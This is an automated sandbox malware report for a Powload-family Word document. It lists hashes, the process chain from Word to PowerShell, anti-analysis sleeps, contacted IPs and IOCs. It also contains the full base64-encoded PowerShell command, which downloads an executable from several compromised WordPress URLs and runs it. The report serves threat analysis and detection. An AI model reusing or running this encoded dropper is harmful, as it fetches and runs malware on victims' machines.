Docs_9b58406a548c3db723f3d6e7370903b7_html_2019-08-15_08_30.txt

1.  
2. * MalFamily: "Powload"
3.  
4. * MalScore: 10.0
5.  
6. * File Name: "Docs_9b58406a548c3db723f3d6e7370903b7.html"
7. * File Size: 165504
8. * File Type: "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 2 11:37:00 2019, Last Saved Time/Date: Thu May 2 11:37:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0"
9. * SHA256: "ee12d6a7678d385cad6d92d505223faf379e765e2e4aa55694b49d462445ae64"
10. * MD5: "9b58406a548c3db723f3d6e7370903b7"
11. * SHA1: "ee663c240030897a214a1c2b56a29476af773611"
12. * SHA512: "95b92a03e90ef07a72733974864c6e96cd595c1011a0cb068cf33fe28e7a17aaa0614195b50654b7fb7d8e6a1dcdf856fbb5ad8717ebea593ad35bd364ec87d5"
13. * CRC32: "B8A33081"
14. * SSDEEP: "3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qyTl7IlSeAvMnyor/6GN9aLhJa/LF:h77HUUUUUUUUUUUUUUUUUUUT52Vzl7Uz"
15.  
16. * Process Execution:
17. "WINWORD.EXE",
18. "svchost.exe",
19. "WmiPrvSE.exe",
20. "powErSHell.exe"
21.  
22.  
23. * Executed Commands:
24. "powErSHell -e JABFADQANgA1ADgANgAyADEAPQAnAFEANgA0ADUANQAyADcAJwA7ACQAdwA1ADQANwA0ADMAOAAzACAAPQAgACcAOQA3ADQAJwA7ACQAbwA2ADYAMAAxAF8APQAnAHoAXwAyADMAMAA0ADYAMwAnADsAJABDADUAMQAyADAANQA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3ADUANAA3ADQAMwA4ADMAKwAnAC4AZQB4AGUAJwA7ACQAUwA4ADkANAA5ADkANAA1AD0AJwBIADIAOAA5ADAANwBfADcAJwA7ACQAbAAyADUAXwBfADMAXwA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAQgBjAGAAbABJAGUAYABOAFQAOwAkAHcAMgAwAF8ANgBfADUAPQAnAGgAdAB0AHAAOgAvAC8AcAByAG8AZwByAGEAbQBtAGUAcABoAGUAbgBpAHgALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBsAGEAbgBnAHUAYQBnAGUAcwAvAGsAagBkAHgAMABsAHMAMgAvAEAAaAB0AHQAcAA6AC8ALwBhAHgAbABlAHQAaQBtAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHIAMABnAG0AeAA0ADAAMgAwADgALwBAAGgAdAB0AHAAOgAvAC8ANQBlAGwAZQBtAGUAbgB0AHMALQBkAGUAdgBlAGwAbwBwAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG8AZQBzAHAAMQA2AC8AQABoAHQAdABwADoALwAvAGIAZQBzAHQAcABoAG8AdABvAGcAcgBhAHAAaAB5AHQAbgBqAC4AYwBvAG0ALwByAHIAbQA5AC8AbABtADgAMwB5AHgANQAxADgALwBAAGgAdAB0AHAAOgAvAC8AYwBpAHQAaQBsAGkAbgBlAHMAaABvAGwAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALwBjAHkAcwBrADkAdwBoADgAMwAyAC8AJwAuAFMAcABsAEkAdAAoACcAQAAnACkAOwAkAFUAOAAwADUAMgA3ADYAMgA9ACcAdQAzADcANwA3ADcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE8AMwA5ADUANwAxACAAaQBuACAAJAB3ADIAMABfADYAXwA1ACkAewB0AHIAeQB7ACQAbAAyADUAXwBfADMAXwAuAGQATwBXAE4ATABPAEEAZABGAEkAbABlACgAJABPADMAOQA1ADcAMQAsACAAJABDADUAMQAyADAANQA0ACkAOwAkAG4AOQA2ADcAXwA4ADYAPQAnAFQANAA0ADUAXwA2ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQwA1ADEAMgAwADUANAApAC4ATABFAE4AZwB0AGgAIAAtAGcAZQAgADMANwA0ADIAMAApACAAewAmACgAJwBJACcAKwAnAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACAAJABDADUAMQAyADAANQA0ADsAJABzADQAMgAzADMAMwAwADEAPQAnAFoAMQAyADQAMwA1ADkAMQAnADsAYgByAGUAYQBrADsAJABtADIAMAAzADMAMgAwADQAPQAnAG0AOQAxAF8AOQAxADQANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwADAAOAA3ADUAMwA9ACcAQwBfADIANQA4ADkAXwA4ACcA"
25.  
26.  
27. * Signatures Detected:
28.  
29. "Description": "A process attempted to delay the analysis task.",
30. "Details":
31.  
32. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
33.  
34.  
35. "Process": "WINWORD.EXE tried to sleep 298 seconds, actually delayed analysis time by 0 seconds"
36.  
37.  
38.  
39.  
40. "Description": "Attempts to connect to a dead IP:Port (11 unique times)",
41. "Details":
42.  
43. "IP": "52.109.20.1:443"
44.  
45.  
46. "IP": "52.109.20.4:443"
47.  
48.  
49. "IP": "208.185.118.88:80"
50.  
51.  
52. "IP": "104.18.24.243:80"
53.  
54.  
55. "IP": "52.109.2.16:443"
56.  
57.  
58. "IP": "23.38.126.36:443"
59.  
60.  
61. "IP": "67.131.44.58:80"
62.  
63.  
64. "IP": "40.91.122.234:443"
65.  
66.  
67. "IP": "72.21.91.29:80"
68.  
69.  
70. "IP": "67.131.44.11:80"
71.  
72.  
73. "IP": "23.79.211.33:443"
74.  
75.  
76.  
77.  
78. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
79. "Details":
80.  
81. "ioc": "turabian.xsl"
82.  
83.  
84. "ioc": "ontent.inf"
85.  
86.  
87. "ioc": "chicago.xsl"
88.  
89.  
90. "ioc": "gosttitle.xsl"
91.  
92.  
93. "ioc": "ieee2006officeonline.xsl"
94.  
95.  
96. "ioc": "e.gu"
97.  
98.  
99. "ioc": "nline.xsl"
100.  
101.  
102. "ioc": "ist.glox"
103.  
104.  
105. "ioc": "ext.glox"
106.  
107.  
108. "ioc": "adial.glox"
109.  
110.  
111. "ioc": "rid.glox"
112.  
113.  
114. "ioc": "..3b"
115.  
116.  
117. "ioc": "ccent.glox"
118.  
119.  
120. "ioc": "gostname.xsl"
121.  
122.  
123. "ioc": "mlaseventheditionofficeonline.xsl"
124.  
125.  
126. "ioc": "quations.dotx"
127.  
128.  
129. "ioc": "gb.xsl"
130.  
131.  
132. "ioc": "iso690.xsl"
133.  
134.  
135. "ioc": "pictureorgchart.glox"
136.  
137.  
138. "ioc": "architecture.glox"
139.  
140.  
141. "ioc": "iso690nmerical.xsl"
142.  
143.  
144. "ioc": "chevronaccent.glox"
145.  
146.  
147. "ioc": "rocess.glox"
148.  
149.  
150. "ioc": "rc.glox"
151.  
152.  
153. "ioc": "sist02.xsl"
154.  
155.  
156. "ioc": "harvardanglia2008officeonline.xsl"
157.  
158.  
159. "ioc": "rings.glox"
160.  
161.  
162. "ioc": "set.dotx"
163.  
164.  
165. "ioc": "rame.glox"
166.  
167.  
168. "ioc": "anded.thmx"
169.  
170.  
171. "ioc": "content.inf"
172.  
173.  
174. "ioc": "etropolitan.thmx"
175.  
176.  
177. "ioc": "ype.thmx"
178.  
179.  
180. "ioc": "iew.thmx"
181.  
182.  
183. "ioc": "asis.thmx"
184.  
185.  
186. "ioc": "ividend.thmx"
187.  
188.  
189. "ioc": "rame.thmx"
190.  
191.  
192. "ioc": "eadlines.thmx"
193.  
194.  
195. "ioc": "arallax.thmx"
196.  
197.  
198. "ioc": "avon.thmx"
199.  
200.  
201. "ioc": "adge.thmx"
202.  
203.  
204. "ioc": "uotable.thmx"
205.  
206.  
207. "ioc": "rop.thmx"
208.  
209.  
210. "ioc": "late.thmx"
211.  
212.  
213. "ioc": "erlin.thmx"
214.  
215.  
216. "ioc": "roplet.thmx"
217.  
218.  
219. "ioc": "amask.thmx"
220.  
221.  
222. "ioc": "ircuit.thmx"
223.  
224.  
225. "ioc": "g.n9"
226.  
227.  
228. "ioc": "esh.thmx"
229.  
230.  
231. "ioc": "eathered.thmx"
232.  
233.  
234. "ioc": "vent.thmx"
235.  
236.  
237. "ioc": "rail.thmx"
238.  
239.  
240.  
241.  
242. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
243. "Details":
244.  
245. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
246.  
247.  
248. "suspicious_request": "http://programmephenix.com/wp-content/languages/kjdx0ls2/"
249.  
250.  
251. "suspicious_request": "http://axletime.com/wp-admin/r0gmx40208/"
252.  
253.  
254. "suspicious_request": "http://5elements-development.com/wp-content/uoesp16/"
255.  
256.  
257. "suspicious_request": "http://bestphotographytnj.com/rrm9/lm83yx518/"
258.  
259.  
260.  
261.  
262. "Description": "Performs some HTTP requests",
263. "Details":
264.  
265. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
266.  
267.  
268. "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
269.  
270.  
271. "url": "http://programmephenix.com/wp-content/languages/kjdx0ls2/"
272.  
273.  
274. "url": "http://axletime.com/wp-admin/r0gmx40208/"
275.  
276.  
277. "url": "http://5elements-development.com/wp-content/uoesp16/"
278.  
279.  
280. "url": "http://bestphotographytnj.com/rrm9/lm83yx518/"
281.  
282.  
283.  
284.  
285. "Description": "The office file has 2 macros.",
286. "Details":
287.  
288.  
289. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
290. "Details":
291.  
292. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01u\\x0fz\\x9d\\xb2y\\x81\\xcb\\xfb_\\xf0l\\xf6\\xae1@\\x10su#\\x1c\\xf2\\xa0\\xc5\\xdck5\\x07\\x10s\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1coffice15client.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
293.  
294.  
295. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb0*\\x14\\xdc\\xc1\\xdd\\x85\\xf4\n\\x85\\xa2=\\x7fy\\x0e\\xe3vs\\xc6\\xb9\\xd9uc(\\xa9\\x93f\\x1c\\xcc\\x07w\\xfb\\x19y#2\\xabx)8\\x16\\xdb\\xf2\\xae\\x81\\xe6\\xe3\\xf1\\x95\\xed\\xbc\\xd9\\x17c\\x08)\\x14\\x05\\x19\\xce(\\x98\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000&\\xb6\\x99\\xea\\x9d9p@\\x03c_\\xa2\\x16\\x12\\xc1\rf\\x85\\x0bd\\x8c\\xf1\rl\\xfc\\x1b\\xef\\xbc_b\\xf8q\\xefgo\\x1b\r|p\\xa7\\x13\\x01\\x0f\\xe3\\x01dp"
296.  
297.  
298. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xf8\\x90\\x17\\xff\\xea\\xdd\\xea\\x84cc\\x1c\\x8d<y\\xb5\\x1f\\xcf\\x08\\xa0\\\\xf0\\xa6\\xaf\\xd7\\xc5ve!\t\\x0cc\\xd62z\\xb0\\x93\\xect\\xc6\\xdc\\x82\\x12\\x8e\\xe0\\xff\\x06|fc\\xfd\\xa4_\\xd5\\xce\\x81\\xa9\\x9b\\xb7\\x98\\x8b\\x82\\x88\\xd6\\x07\\xb1\\x99\\x1c<\\x03|\\xe51l\\xd2:<xrolc\\x0f\\xa8c\\j\\x1d\\xc4\\xcd\\xa9\\x9f\\xe56\\xf7\\xe7\\x03/!0\\x9di\\xdfz\\x02\\x15\\xd2\\xe7\\x98y\\x0c\\_\\xc5\\x89\\x8e\\x8f\\x7f\\xa7\\x9e\\xf9\\xa1)\\x03\\x9cn\\xee\\xf5\\xba\\xf3\\x0cn\\xf4\\xd2y\\x9b\\x9fu\\xdax\\x7f\\x1ca,\\x9cqm\\x94\\x0e\\x99/\\x7f\\xf8\\x06\\x9a\\xe0\\x99g\\xc1d\\x82\\xd3\\x8f\\xdb;\\x7f\\x94\\xc9\\x9d\\xde\\xe6\\xd0\\x1b \\xb4/\\x10\\x82\\x8e\\xea8\\xbe\\xb4cm\\xf2\\x0e\\x84h\\xd9\\xc2nsz<\\xed\\x9a\\xaf\\xbei\\x95\\xff\\\\x1eh\\xa4\\x85\\x82s\\x1d(\\xec-\\xd3\\x9b\\x8acg7\r\\xfb\\x13\\xa7w\\x11\\xd8$.\\x94\\xc2)\\xae\\xd5\\x9f\\x1fdv\\xe5\\xba\\x07o\\xd2\\xeab6ea\t\\xb7\\xf0"
299.  
300.  
301. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01u\\x0f\\x96\\xa6o3n\\xb3\\xc3.\\xfb&f\\xbc\\xe1\\x7f\\x89\\x1f\\xdbz/711\tje\\x15a\\xe7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
302.  
303.  
304. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01u\\x0fs\\xfc\\\\xd1\\x03\\x83#i(z\\xa0\\xa4x\\xf4%7\\xf1w\\x1d\\xecce\\x19\\x9f\\xe2(m\\x97\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
305.  
306.  
307. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe6h\\x1a0\\x11\\xb8\\xd10\\x16m\\x8cf\\xd9y5\\x95\\xc1ne\\xa5\\xdc\\xdf\\x82\\x1f\\x97\\xffh\\x1c0\\x12\\xd8\\xd0\\xdd\\xf8l\\x93\\x91m\\xcd\t\\x97zj(\\xdcj\\xa3\n\\xb9w+\\xbc\\x18f\\x8e\\x05\\x9d\\xeb@\\xc7\\x1fx\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000r\\xf4-0i\\xb7\\x05a\\xea\\x16\n\\xb1!\\xf0\\xcb\\x92|\\x178x\\xcf1$\\xfd\\x9f\\xb5o:\\xaf`\\xdbh7\\x98\\xf9\\xa2a\\x92\\xbf5r\\x8f\\x19$\\xc5\\x0bv\\xf0"
308.  
309.  
310. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x88\\xa7\\xec\\xff\\xa6q\\xa8xyk\\x84\\xfbu)\\xd8\\\\xe8\\xe2dmz\\xbf\\x1d\\xab\\x8e~n\\x03\\x0b\\x99\\xde\\xeec\\\\xd2\\xfb+\\xa3\\xef\\xc9\\xb9f\\xd2\\x04c\\x9e\\x157\\xd7\\xc5\\xb2.\\x9b\\xd7\\x99c\\xc3k\\x7f\\xbb\\xc4d\\x91\\x8b\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf7\\xf2\\x03\\x8d\\xc6\\xd5\r\\xd4o!\\xf4\\xf4k\\xf0d\\xdc\\xf3,\\xc8\\x15\\xcfg1\\xb5\\x0f:\\xb8\\xa1\\xe4(@\\xeebf=\\xe8\\xf4\\xcd5\\x95\\x0c\\xf1zynl\\xcc"
311.  
312.  
313. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xd1\\xa7\\x16_sy\\xad\\xfd\\xf3\\x86\\xe6\\xd6\\xec\\x97\\x7f\\x05\\xfd\\xa6pz\\xe4\"\\xa5u.\\x8f\\xef\\x95\\xa1f\\x1c\\xadf\\x11k\\x08b\\xa7\\x94\\xc8\\x859\\xbd\\x1f\\xda0e\\x1e\\xe3\\xe4\\x0e\\x84\\x84c\\xc8l\\x02\\xe1\\x05\\xf7\\x90\\x08\\x9d\\xcf\\xd0\\xec5\\xb1\\xdc\\x0f\\x9f\\x89\\xf5\\xd2\\xdf\r\\xebw`\\x90d\\x17q\\x94e\\xa2\\xa0\\x17\\xf3\\x81\\x87\\xb5\\x8a\\xa4\\xa2+\\xed\\x88\\x02\\x80o\\x9a\\xc9\\xcf\\x7f\\xa5w\n\\xcf\\xa8\\x99\\xf9g\\xbbu\\x0e\\xfc\\xc3i\\xfc\\xb7)2\\xc7\t\\x95~;q\\xd3\\xd5\\x84\\xa1\\x97q\\x86\\xe2-\\x897\\xc2n\\x03>\\xd1k\\x05\\xdb\\x1e\\x97\\xd2\\xcc\\xc7\\xb2sp\\xda\\xeb\\xf0\\x18\\xd9\\x03\\xa9\\xa0~\\xf8\\xbfz\\xd8\\xe5\\x10\\xc1i\\x17\\xecv\\xb1\\xef\\xad*\\x9f\\xf6\\x16\\xd6\\xcf\\xc7\\xc9\\x03\\xf8-\\xd4\\x88c\\xcd\\xa5me\\xde2\\xbf(\\xfd_z\\x1c\\x88\\x814q\\x13\\x9ba*\\xc1\\xe7\\xb6\\x1d\\xad\\x00\\xe4\\xe0\\xe3\\x1b\\xa1\\xb1wf\\x91\\x8c\\xe8\\x17 \\xf5\\xb8\\xd2\\xc7\\xe8\\xecf\\x92\\x8c\\xf5\\xd4\\x9f\\xeby\\x14\\xc4\n"
314.  
315.  
316. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
317.  
318.  
319. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
320.  
321.  
322. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x02\\xd25^jey\\xb6p.\\xa7\\x07,o\\xcd\\xed8\\x03r\\xd6\\x1fq\\xf7\t7e\\xdd\\x08\\xa8\\xb3\\x9b\\xcf\\xcf\\xf8\\xf2\\x89\\x95\\x949\\x822\\xaf\\x99\\xa8y\\x16;\\xfd\\xc9nb\\x9ap\\xca\\xaf2\\x1a\"\\x822\\xc0t\\x9am\\xb7\\xdc9n\\x00%\\x11\\x0e\\x88\\xb3\\xc7\\x8a\\xcc\\x934?\\x00\\x1e\\x17 7k~\\xea\\x9ew\\xf7\\xa3\\xf0\\x82\\xa2i\\xbb\\x17\\x15\\x0f\\x05\\x9fay\\xdbc+b\\xcc\\xb5\\xa9\\xf9\\xbe\\xfaei\\xc6g\\xd3dv\\xeea\\xe9(t\t\\xd1r\\xf6\\x1c\\xba\\xa6\\x10j\\xaej\\xb6iz\\x9d\\x9e\\xc8z\\xac\\xf5\\xd2\\xb0\\xfe\\x19'\\xbdy\\xa8\\xc0\\x9e\\x83\\xef\\xe6\\x88\\x0f\\xd5chw\\xd4\\x955\\xd0\\x8dxj\\x1a?\\xdc8\\x08\\xc5\\x92&'~p\\xc9x\\xc5\\xdf\\xc9\\x8f\\xecm\\x8d\\xf9+*6\"\\xdb\\x1bq\\xa5\\x9b\\x10p\\xe6\\x9a\\x1e5\\xc3\\xca\\x03\\xc7\\xc3yn\\xabl(\\x95\\xb9\\xc4\\x0e\\x9d\\xce\\xb1u\\xd0\\x8f\\xc6\\xb6\\xff\\xb4\\xc3\\xbe\\xd8\\x81\\xb3b\\xd4~\\xd0\\x17\\xf0\\x0fj\\xf6"
323.  
324.  
325. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 >\\xacn\\xec\\xb2~>ol\\xf3k\\x12\\xbd\\xfd\\xca\\xe5\\xb2\\x96!\\x1e\\xee1\\xe7\\xda<\\x06\\x062\\xeb\\x8e\\x8f\\xfe\\xcfs\\xc9\\xa7@_\\x8d\\x12\\xce\\x16\\xf8g\\xb06\\xab'@\\x06y\\x8d\\x7f!\\x7f\\xf8\\xdd\\x87\\x97o\\xf8p\\x99\\x03\"q\\x9e<\\xd4k\\xc0\\x03\\x0ew\\xfdk\\x94\\xd8\\xcbn\\xcd#\\xf7b\\xd2\\xf5\\xd4\\x01\\xd0\\x88e4*+t)a\\x8a\\xea >o\\x15\\x0b\\xb0\\xbc\\xad\\x82\\xb2\\xfc\\xe7\\xbb\\xa5\\a\\x9c\\xb0\\x7f\\x89k\\x05\\xa4\\xa9\\xf0z\\xa4ac\\xc0\\x9a|\\x12\\xdbi\\x9f;n d\\xda\\x94\\xae\\xea\\x9c>\\xed\\x0f\\xd7\\xc3\\x1c\\x98g\\xa5\\x86\\x96\\xe2\\xb6\\x9c\\x87?7\\x10\\x19\\xc1\\xe9&\\xde\\xc8\\x04\\x95ku\\x00\te\\xd0\\xed\\xe0\\xddc\\x81'\\x87+xo\\xd5\\xd1\\x1be\\xab\\xc0\\x1e\\xd3\\xd0x\\xe5d\\xc3\\x8d\\xde\\xd0 k$\\xc6\\xbd\\xd1\\x9bd\\xf8\\xc9.\\xbd\\x1a>\\x90\\x8e\\xf5\\x93\\xea\\xaa\\xe5\\xb4\\x15\\x8f\\xc6\\x9d;\\xee\\x08z\\xda\\x8f\r\\xa3i+\\xb3\\xfah\\x01\\xbe/\\xa4"
326.  
327.  
328. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01u\\x0fj2<\\xd1\\xe3\\xbbj\\x18\\x98\\xa2wk\\x9c_\\x1c\\xab$p\\xba1\\x9a\\xdd\\xbbfk\\xe9\\xc4\\xb3\\xba\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
329.  
330.  
331. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04x?5\\xe7\\xe5\\x0c\\xa7\\xb7|\\xc3\\xa6\\x98\n\\x9b\\x8c\\xb5\\x92\\xdeo%\\x8d\\xdb\\xdb\\x92\\xea\\x83|o\\x89\\x19\\x894gz!\\x80s\\x97\\xd0\\xb3\\x88,\\x01\\xd9\\xdd\t\\xd6\\xfa\\x92\\x9c\\x85\\xfcz\\xa5\\x90\\xcf\\x99u\\xc5\\xce6)\\xdf\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xec\\xc2\\xde\\xe9\\x88\\xa3 t\\x97\\xdb+\\x06,:,\\xb1i9\\xbe5\\x94\\xb7z\\x1apad\\xe4\\x0f\\x02\\xb1(\\xfc5r\\xf8gx\\xfd\\xdf\\xc0\\xe6\\x00\\x13\\xbe7"
332.  
333.  
334. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xb6\\x91o\\xae\\xad\\xb0\\x19\\xf8\\xb3\\xd9l\\x85|\\xf1\\xbdz\\xf3\\xa4\\x85?fd(\\x97v\\xe8\\x0cb\\xf3\\xcc\\x08v\\xd8a\\xee\\x13\\x8f\\xfa7u\\x04gq7\\x9c\\x13\\xbe\\x1ef\\xd2c0\\xb6>\\xa2w\\xde\\x19\\xdb\\x9fpt\\x19\\x0e8\\xf4\\xcd\\xa6\\x9f\\xe7x\\x12@ \\xad\\xf9)\\xce^c\\xe0\\x14\\xdfb\\x83\\xbc(\\x04?\\xa6\\xbd\\xed\\xfe\\x9e\\xba\\xe3\\xf8\\xd6:\\x1a\\xd9~c>\\xc3\\x06\\x06p\\xd5\\x1b\\xeb\\xdf\\xaf\\x9d\\xc5\\xfa\\xa1&6\\xcc\\xfb\\x0c\r\\xfe\\xe1\\x14:w=x\\x08c\\xab\\xe0\\xc6\\xb7\\x9a\\xa6\\xd3|^\\x8e\\xd7\\x01\\x89\\xd7\\xd0\\xc0r\\xfa\\xe3\\xe9(kx\\xc4\\\\x1f3u\\xf5.\\xdf\\xbfj\\xcc-9\\x085\\x93c\\x8d\\x87e\\x8dm.\\xe8shzn\\x94+\\xa9\\x18\\xc8\\xda\\xf5j\\xf7\\xe0r\\xe0\\x12h\\xae\\x98\\x88s\\x1a\\x12\tog\\x07\\xc6\\x91i!\\x0ej\\x92\\x8c\\xa2gy@>\\xb2.\\xa5(\\x84l\\xe9q\\x03\t\\xca\\xdda\\xbe\\xefn2\\xc2\\xc1u\\xa9c\\xeb\\xa9.*q\\xc0"
335.  
336.  
337. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl\\xd2\\xa7x\\xe3\\0\\xe2\\xef\\x1a\\x1a\\x90\\x0c\\xe0~\\x96a\\xe2/<x\\xf8zy\\x08\\xf0\\x1b\\x8b+\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
338.  
339.  
340. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0fl)92k\"\\xe3\\x7fhyk\\x87\\xf1\\xa5\\xfb\\x12^\\xe4vqv*\\x8c\\xb7\\xc7\\xff\\xa7\\xa1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
341.  
342.  
343. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01u\\x0flt\\xb9a\\xde\\x8b\\xc4\\xb1\\xa0\\xb69\\x04\\xc1\\xe1/\\x9a\\xd3\\x13\\xc7\\xa2\\xd6\\xaa\\xc4\\xaa\\xa2\\x7f\\x84y=\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
344.  
345.  
